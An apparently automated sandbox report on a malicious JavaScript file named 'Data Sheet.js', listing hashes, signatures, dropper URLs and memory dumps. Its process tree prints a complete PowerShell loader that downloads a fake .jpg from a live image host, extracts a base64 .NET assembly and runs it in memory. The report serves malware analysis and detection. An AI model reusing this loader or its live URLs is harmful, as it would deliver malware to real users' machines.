Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/08/2023, 08:02

General

  • Target

    Data Sheet.js

  • Size

    309KB

  • MD5

    afd8e5cf16a995fe756faf6ccf8e15fd

  • SHA1

    0bca0468df0e23d222747ee186d19939d70d6075

  • SHA256

    6f3dbcffcbe63ba6106c43f0ea704f14ab24e5c9247ab246b17d37e9da86797c

  • SHA512

    296d4ddef9f532214276eb14f7e8f3e83ec22750635aa95857c0c8effbe774c39828667bea3ed601dd8f1667aef7b3d621b0e5d7f628ef3ffc240f4f9d409488

  • SSDEEP

    6144:hAGQUj1pPA4DlDlDlDlDlDlDlV7/tQNQNQNQNQNQNQNfC9ApsCKQAnAMAMAMAMAR:hAIPA4DlDlDlDlDlDlDlh/tQNQNQNQNW

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/572/679/original/rump_js_link64_startup.jpg?1691689535

exe.dropper

https://uploaddeimagens.com.br/images/004/572/679/original/rump_js_link64_startup.jpg?1691689535

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\Data Sheet.js"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2808
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $imageUrl ='https://uploaddeimagens.com.br/images/004/572/679/original/rump_js_link64_startup.jpg?1691689535';$webClient =New-Object System.Net.WebClient;$imageBytes =$webClient.DownloadData($imageUrl);$imageText =[System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex =$imageText.IndexOf($startFlag);$endIndex =$imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex +=$startFlag.Length;$base64Length =$endIndex - $startIndex;$base64Command =$imageText.Substring($startIndex, $base64Length);$commandBytes =[System.Convert]::FromBase64String($base64Command);$loadedAssembly =[System.Reflection.Assembly]::Load($commandBytes);$type =$loadedAssembly.GetType('Fiber.Home');$method =$type.GetMethod('VAI');$arguments =,('dHh0LkRELzQzMS4xNy42MTIuNTgxLy86cHR0aA==');$method.Invoke($null, $arguments)
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3864

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xbxiqjag.o1l.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/3864-9-0x000002A290C40000-0x000002A290C62000-memory.dmp

          Filesize

          136KB

        • memory/3864-10-0x00007FFE1D220000-0x00007FFE1DCE1000-memory.dmp

          Filesize

          10.8MB

        • memory/3864-11-0x000002A290C70000-0x000002A290C80000-memory.dmp

          Filesize

          64KB

        • memory/3864-12-0x000002A290C70000-0x000002A290C80000-memory.dmp

          Filesize

          64KB

        • memory/3864-13-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-14-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-16-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-18-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-20-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-22-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-24-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-26-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-28-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-30-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-32-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-34-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-36-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-38-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-40-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-42-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-44-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-46-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-48-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-50-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-52-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-54-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-56-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-58-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-60-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-62-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-64-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-66-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-68-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-70-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-72-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-74-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-76-0x000002A2A9F80000-0x000002A2AA29A000-memory.dmp

          Filesize

          3.1MB

        • memory/3864-146-0x00007FFE1D220000-0x00007FFE1DCE1000-memory.dmp

          Filesize

          10.8MB

        • memory/3864-184-0x000002A290C70000-0x000002A290C80000-memory.dmp

          Filesize

          64KB

        • memory/3864-239-0x000002A290C70000-0x000002A290C80000-memory.dmp

          Filesize

          64KB